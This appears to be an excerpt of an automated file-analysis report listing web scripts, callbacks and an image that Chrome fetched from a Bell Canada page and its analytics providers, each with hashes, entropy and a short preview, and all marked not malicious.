                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRETYo1yqXXl6E0UeQ1CSHI:UrXiQPwqX11eMRo
                                                                                                                                                                                                                                                                                                                                      MD5:9F2BDB83488BC7B786ADFC8279E8E35F
                                                                                                                                                                                                                                                                                                                                      SHA1:7E8FEA3B04DB0B8EA69F40142958295649DC536E
                                                                                                                                                                                                                                                                                                                                      SHA-256:0E88E433A9FE4454ED228A2F0CA00D65D44CFEA33CE5E2B2145C6C4CFB340AFF
                                                                                                                                                                                                                                                                                                                                      SHA-512:4AF6B2990A04CAD602DF8451F2E1150BC611183EC4C15E9FC2A3F823C6E3CAE311C450BD0266E018B2090F2C0159E088F41A5CCD9BBFA71928C02EDD81362C08
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__7
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__7 === 'function' && branch_callback__7("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 587x600, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):20486
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.796891007553271
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:k5cMPL0bbQ5CDL0pF79QTCJSISc6JUMz+D0X7MVKDRLU:k5c00bbNDY779N9sUS7BlU
                                                                                                                                                                                                                                                                                                                                      MD5:1FFCAEC7E9878C830323B60A8BB86FB4
                                                                                                                                                                                                                                                                                                                                      SHA1:315AA4FEB415806DE5407DB2B97D01ABE14D3B6C
                                                                                                                                                                                                                                                                                                                                      SHA-256:760498E35AC620FAE05E6C1B1BC6C8224F38ED9151379C31203745AABB580F55
                                                                                                                                                                                                                                                                                                                                      SHA-512:E11FFFCAF9B5C4BB14FCB06B7811DCDAC5AA68957B5A1C1A0F38125E1016AB80B96C51D2AFF1D4CB0FBD5F2C5F22643226F607B17CDACFBCECFC4FC661D6E3E3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.............C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......X.K....................................................................................`.............................................................................................................................................................................................................A............................C..{ga..<|.N...........................?^.9.GZg<.e..........................(y.... .uG....l...m+...@.......................?_AKO...............gA.......................P.....>[..:N..k.....C...89..8......................-<.,{.....O(...]..b.I...zybq.vX.....................P.7...7s./........qU...l.v.vY/...[{.n.....................B...>..I?OG..z6..5.M.S.....zm....yp....................ZT.}.<c..w....{5.4..-..X.u.Y...->S.K.....................1....>3f......,q.r..(6i...ia..E....................
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (774)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):43211
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.519539023318683
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:0W+FIMt+5FdAPnMhpn2g6IKO9yZI92tMujTXOyrbARaLPk6TO3Am8biK4gZK/Xf+:0Wz/pKC9qng6T3WKXK/XfNPhNREhSQ
                                                                                                                                                                                                                                                                                                                                      MD5:DA800C7A6725ACD0F789BD737CF188FF
                                                                                                                                                                                                                                                                                                                                      SHA1:C3B1073526101A7490744695BFCD2871ABBFFB04
                                                                                                                                                                                                                                                                                                                                      SHA-256:7A28F558E497F8ECEBC8242CCBA48DE0E9CB6A1D9A49A2DAF020935EA9449E27
                                                                                                                                                                                                                                                                                                                                      SHA-512:3C14202920560B97D1D7D9050168DCA5F5DF3289E09148AF6AB73D74A4D3EE0F88E0E37D26B204A37F840BEB5550A69DF51F6EC9BCDD6B7AE714FDC2EAB4938A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/ruxitagentjs_D_10299241001084140.js
                                                                                                                                                                                                                                                                                                                                      Preview:(function dn(){function fb(u,t){return Wa(u)&&"href"===t?1:Za(u)&&"value"===t?32:qc.Qd.some(function(A){return A.test(t)})?16:Pa(u)&&"value"===t?2===mb(u)?16:1:1}function mb(u){if(Ra(u)||Ra(u.parentNode))return 1;qd.has(u)&&Yc.set(u,Yc.get(u)|8);ad.has(u)&&Yc.set(u,Yc.get(u)|2);uc.has(u)&&(qc.qb?kd.set(u,kd.get(u)|1):kd.set(u,kd.get(u)|4));La(u)&&u.hasAttribute("data-dtrum-mask")&&(Oa(u)?kd.set(u,kd.get(u)|4):Yc.set(u,Yc.get(u)|10));if(Yc.has(u))return Yc.get(u);if(kd.has(u))return kd.get(u);var t=.u,A=!1;t.nodeType===Node.TEXT_NODE&&(t=t.parentNode,A=!0);var P=Oa(t);var ea=A;void 0===ea&&(ea=!1);ea=!P||ea||"OPTION"===t.nodeName?(P?kd:Yc).get(ea?t:t.parentNode):void 0;var Ma=void 0;P&&cb(qc.ub,t)&&(Ma|=4);!P&&cb(qc.sb,t)&&(Ma|=2);!P&&cb(qc.yb,t)&&(Ma|=8);if(Ma||P)a:if(P=void 0===P?!1:P,A=void 0===A?!1:A,!P&&Ma)ea=Ma;else{if(P){Ma=Ma&&!(Ma&1)||qc.qb?(!Ma||Ma&1)&&qc.qb||Ma&&!(Ma&1)&&!qc.qb?t.parentNode&&Oa(t.parentNode)?ea&&!(ea&1):!0:!1:ea&&!(ea&1);if(A&&Ma){ea=ea?ea:2;break a}if(Ma){ea
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (27262)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):30953
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.404483058426303
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:eM3+xW4/2+/6/oCeF8wPnzxN2DiBGhLylG4DXYGmB:eMPcU/o182EhLSUGmB
                                                                                                                                                                                                                                                                                                                                      MD5:BD44B299FB6FD5B9A2A3F4F3C080F85C
                                                                                                                                                                                                                                                                                                                                      SHA1:4AB2E75A0C0AA0C6ECD12FED26C502C81506154B
                                                                                                                                                                                                                                                                                                                                      SHA-256:E34FC3965EDB73D7835C318A20B403FCDD6F86269B95B2F9B58A07A3A974F1D8
                                                                                                                                                                                                                                                                                                                                      SHA-512:388D43D87BB57F0143D04660AEB392E0FB419FF6FC9672DCEC6D8CE685366BD5027FC615FB1C151A36D18BB8182CA7C44925FEA8ADD0A197FC60361AADC0762D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/styles/tealeaf/tltWorker.js
                                                                                                                                                                                                                                                                                                                                      Preview:/*! pako deflate 1.0.11 with Dojo/ReactJS fix. The fix consists of the forcing of the assignment of the returned object from the call to 't()' to 'window.pako' */.!function(t){self.pako=t()}(function(){return function i(s,h,l){function o(e,t){if(!h[e]){if(!s[e]){var a="function"==typeof require&&require;if(!t&&a)return a(e,!0);if(_)return _(e,!0);var n=new Error("Cannot find module '"+e+"'");throw n.code="MODULE_NOT_FOUND",n}var r=h[e]={exports:{}};s[e][0].call(r.exports,function(t){return o(s[e][1][t]||t)},r,r.exports,i,s,h,l)}return h[e].exports}for(var _="function"==typeof require&&require,t=0;t<l.length;t++)o(l[t]);return o}({1:[function(t,e,a){"use strict";var n="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Int32Array;a.assign=function(t){for(var e,a,n=Array.prototype.slice.call(arguments,1);n.length;){var r=n.shift();if(r){if("object"!=typeof r)throw new TypeError(r+"must be non-object");for(var i in r)e=r,a=i,Object.prototype.hasOwnProperty
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1022)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1169
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.552266327151934
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlR/ct/BMlRf6EAKA13c2+zxRWd9fGIJGrWeKa355i3LK3z20EONjqxQ:zlR0t/BMlRNvwdlHwWeAbONuxQ
                                                                                                                                                                                                                                                                                                                                      MD5:FAE35161E66F592C900914B3FB5EEA4B
                                                                                                                                                                                                                                                                                                                                      SHA1:71B2A697B17E5D91C5EDCF0C7B0074E5F4A8DD9F
                                                                                                                                                                                                                                                                                                                                      SHA-256:53D1566D6C7E8924A2D493D48ECD4312F9BE28746E480B2BA1C52AA8B4AEADA2
                                                                                                                                                                                                                                                                                                                                      SHA-512:59B9973E4FDD3CC744B459EF352A03E7E4412B8E6BA2CA6DC38659F7899C7760BF375B60F69EAB2B76D6A08F0EED3C28281E666A66A1DD5D75076096DAFEE611
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd18a66557b034fc5825d670005205c3a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd18a66557b034fc5825d670005205c3a-source.min.js', "try{!function(e,t,a){if(!e.snaptr){var n=e.snaptr=function(){n.handleRequest?n.handleRequest.apply(n,arguments):n.queue.push(arguments)};n.queue=[];var s=\"script\";r=t.createElement(s),r.async=!0,r.src=a;var o=t.getElementsByTagName(s)[0];o.parentNode.insertBefore(r,o)}}(window,document,\"https://sc-static.net/scevent.min.js\");var pgn=(pgn=_satellite.getVar(\"d_page_name\")||\"\").toLowerCase(),prevPgn=_satellite.cookie.get(\"__bda_prev_previouspagename\")||\"\",mobRE=/^shop:(mobile:|Cart mobility:Summary|Checkout (mobility:|accessories:))/i,isMob=mobRE.test(pgn)||\"storelocator:landing page\"==pgn&&mobRE.test(prevPgn),scID=\"50a38fee-9934-45ee-950b-5f4599360ebf\";isMob&&(scID=\"f99033df-58a1-4
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (37462), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):37462
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.35807822929508
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:nu0UAogEz0r+XFq43eBvfbxs0rrsxBusLb7J7BvT4pWeo7MRbKK:u0UndeB3bx5rrsxAw7J7Rvq
                                                                                                                                                                                                                                                                                                                                      MD5:C2298F7F475F4EA09586AA8CE9538C58
                                                                                                                                                                                                                                                                                                                                      SHA1:6B6D89E4C47F6C52C303C2DC88E8D31AED942093
                                                                                                                                                                                                                                                                                                                                      SHA-256:7F2AF60EBBC9FEA1A27AA227E9C3084B0A5F74FD08F35B12843FFC75FF156CF0
                                                                                                                                                                                                                                                                                                                                      SHA-512:81CB02F5EF6638320042DDC88948340AFE2EC48E6D67ACEF73CB3AEA4A893080A9E17307FEBE856E8B3AC0EE5502BFE34AB54D80B8A567B9713229CD2B5D0022
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/* OnlineOpinion v5.9.0 Released: 11/17/2014. Compiled 11/17/2014 01:01:01 PM -0600 Branch: master 7cffc7b9a0b11594d56b71ca0cb042d9b0fc24f5 Components: Full UMD: disabled The following code is Copyright 1998-2014 Opinionlab, Inc. All rights reserved. Unauthorized use is prohibited. This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. http://www.opinionlab.com */(function(a,b){if(('disabled'==='enabled')&&(typeof define==='function')&&define.amd){define([],b)}else{a.OOo=b()}}(this,function(){window.OOo={__detectBrowser:function(a){var b=Object.prototype.toString.call(window.opera)==='[object Opera]',d/*@cc_on=parseFloat((/MSIE[\s]*([\d\.]+)/).exec(navigator.appVersion)[1])@*/,c={IE:!!d,Opera:b,WebKit:a.indexOf('AppleWebKit/')>-1,Chrome:a.indexOf('Chrome')>-1,Gecko:a.indexOf('Gecko')>-1&&a.indexOf('KHTML')===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(a),iOs:a.indexOf('iPad')>-1||a.indexOf('iPho
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):41172
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
                                                                                                                                                                                                                                                                                                                                      MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                                                      SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                                                      SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                                                      SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (24962)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):25115
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.309191635132479
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:NoUjeU5IBNgXPYF+fsjYUbdjIKV8o6jMxldK0Wg+bP32oBWl:NuNgH9LjMkL2oBWl
                                                                                                                                                                                                                                                                                                                                      MD5:C8AFB92BC0D997BA5B673367E69B9FF1
                                                                                                                                                                                                                                                                                                                                      SHA1:9EBB043B6171FED5AE9C3D2FB3B7D2FC97AE24E2
                                                                                                                                                                                                                                                                                                                                      SHA-256:E5F0058D3D737D25B691728BCE12A7D0B77183781C936CA8152E28CACF9E6E3F
                                                                                                                                                                                                                                                                                                                                      SHA-512:58AC9A0EF29DF503F33A9A01AE097F51FC9EF3FA8E1C6795A0E257E6429030F63E96B8D7E042FA973ACB5596E1E2F83F718634F02C81FDFB945EC29F059FD6EE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement_Module_AudienceManagement.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement_Module_AudienceManagement.js`..function AppMeasurement_Module_AudienceManagement(e){var t=this;t.s=e;var n=window;n.s_c_in||(n.s_c_il=[],n.s_c_in=0),t._il=n.s_c_il,t._in=n.s_c_in,t._il[t._in]=t,n.s_c_in++,t._c="s_m",t.setup=function(e){n.DIL&&e&&(e.disableDefaultRequest=!0,e.disableCORS=!0,e.secureDataCollection=!1,t.instance=n.DIL.create(e),t.tools=n.DIL.tools)},t.isReady=function(){return!!t.instance},t.getEventCallConfigParams=function(){return t.instance&&t.instance.api&&t.instance.api.getEventCallConfigParams?t.instance.api.getEventCallConfigParams():{}},t.passData=function(e){t.instance&&t.instance.api&&t.instance.api.passData&&t.instance.api.passData(e)}}!function(){"use strict";var r,o,a;"function"!=typeof window.DIL&&(window.DIL=function(n,e){function t(e){return void 0===e||!0===e}function s(){X||(X=!0,j.registerRequest(),K())}var c,i,I,r,u,h,o,a,d,l,f,p,y
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):369
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.269443233510702
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:jwkMKngJv0KgFXAEAAalgjBQibr4z1XMYA/B3Jv0KgFXAEAAalgjBQibr4zHaFLm:jvgeTrAApBB4hct/BeTrAApBB40Ld+Jn
                                                                                                                                                                                                                                                                                                                                      MD5:7CE4212365BF1DCBC929A4E5EC2D0BE5
                                                                                                                                                                                                                                                                                                                                      SHA1:E62D681532A44585C7D532224F4FC2F9EA1485FB
                                                                                                                                                                                                                                                                                                                                      SHA-256:DB8D8D65ED6E7691A072B75B58C2F686D4E02CAC8639F92377A0A19DAAD1191F
                                                                                                                                                                                                                                                                                                                                      SHA-512:321AE507266B829AB7013A13DF5D86937D440711AADE9F337192FE879392FC7F752F57D22A0060C2D2C21B0FAA8CA1E2A80B9F1E3880FFBDC909AE4ED8394B0F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC622e10283cf14079857536997034ee5f-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC622e10283cf14079857536997034ee5f-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC622e10283cf14079857536997034ee5f-source.min.js', "_satellite.getVar(\"d_tracking_enabled\")||(_da_.da_noAutoPageTrack=1);");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.92586884922945
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRE8MyqXXl6EOd61CSHI:UrXiFqX1W8Ro
                                                                                                                                                                                                                                                                                                                                      MD5:48B934A103D0ACB13D3E761CBB404773
                                                                                                                                                                                                                                                                                                                                      SHA1:CC072E06AF9B99C4D00A7C64CB17F17CF5DB4D16
                                                                                                                                                                                                                                                                                                                                      SHA-256:02B9D804082DD878C0B2FB1F90C976EC47AD6D8D5257427F6BB0DAA48C337D2F
                                                                                                                                                                                                                                                                                                                                      SHA-512:D05D1CBF62F6AC1F564A5D8F2ACD77C70DDB87EDCFE64F150820B56F3D87CDCAF5E4D5BA611AC93105726CC85540D4CB8F8C16EA31115A65ABA6C4F7240C2D0C
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__9
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__9 === 'function' && branch_callback__9("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREOP1yqXXl6EpPXQ1CSHI:UrXid4qX11XMRo
                                                                                                                                                                                                                                                                                                                                      MD5:A8DAA8D6908482A9B0D13CDAB93A6AAC
                                                                                                                                                                                                                                                                                                                                      SHA1:C3B9E5F9E225457C99F89BE4F55194C76F29B70C
                                                                                                                                                                                                                                                                                                                                      SHA-256:ECCEF59CE4BCA06C7D100D0C1169366CEC5ADC568EB561946DE3C3108633EE88
                                                                                                                                                                                                                                                                                                                                      SHA-512:2A8A5F24A166B86C94CB4D93AE703DCE3CCB0A0B156F33C540A0E76EEB2F8C7C5C67433CBC5F18C8B5ABA43CE831A73AB1295DF2A86EF19542E25F436C15D712
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__2 === 'function' && branch_callback__2("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):5348
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.541543298135872
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:FAixKJKlqEW11THMSzrREdktG078WKkfwqUJ2:FH0KrYHM8AmBoOwqUJ2
                                                                                                                                                                                                                                                                                                                                      MD5:EBD28FF2814F26D8607FFC8A0F027AD1
                                                                                                                                                                                                                                                                                                                                      SHA1:AE1DC55B5CA0F60CE997CD434A3579787F2E678E
                                                                                                                                                                                                                                                                                                                                      SHA-256:B36A2D4594A6F4570ABBEF5DF0A0C1FEBF3521E53430D6513A5FFD17338211FD
                                                                                                                                                                                                                                                                                                                                      SHA-512:1C61FAE5FE06079172281B45B226EC1813BC94AB6C88C44258E36C8897ACDFB4A8CA8FDC719951E2E3E0303CC6E83408F64145A9EE85504B9348245F88C847C1
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
